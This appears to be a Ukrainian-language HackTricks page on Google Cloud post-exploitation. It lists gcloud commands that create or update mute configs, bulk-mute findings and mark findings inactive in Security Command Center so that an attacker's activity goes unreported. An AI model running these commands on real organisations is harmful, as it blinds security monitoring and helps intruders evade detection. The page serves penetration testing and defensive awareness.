GCP - Security Post Exploitation

Підтримайте HackTricks

Безпека

Для отримання додаткової інформації перевірте:

securitycenter.muteconfigs.create

Запобігайте генерації знахідок, які можуть виявити зловмисника, створюючи muteconfig:

# Create Muteconfig
gcloud scc muteconfigs create my-mute-config --organization=123 --description="This is a test mute config" --filter="category=\"XSS_SCRIPTING\""

securitycenter.muteconfigs.update

Запобігти генерації висновків, які можуть виявити зловмисника, оновивши muteconfig:

# Update Muteconfig
gcloud scc muteconfigs update my-test-mute-config --organization=123 --description="This is a test mute config" --filter="category=\"XSS_SCRIPTING\""

securitycenter.findings.bulkMuteUpdate

Затримати виявлення на основі фільтра:

# Mute based on a filter
gcloud scc findings bulk-mute --organization=929851756715 --filter="category=\"XSS_SCRIPTING\""

Приховані знахідки не з'являться на панелі інструментів SCC та в звітах.

securitycenter.findings.setMute

Приховати знахідки на основі джерела, знахідок...

gcloud scc findings set-mute 789 --organization=organizations/123 --source=456 --mute=MUTED

securitycenter.findings.update

Оновіть виявлення, щоб вказати на помилкову інформацію:

gcloud scc findings update `myFinding` --organization=123456 --source=5678 --state=INACTIVE
Підтримайте HackTricks

Last updated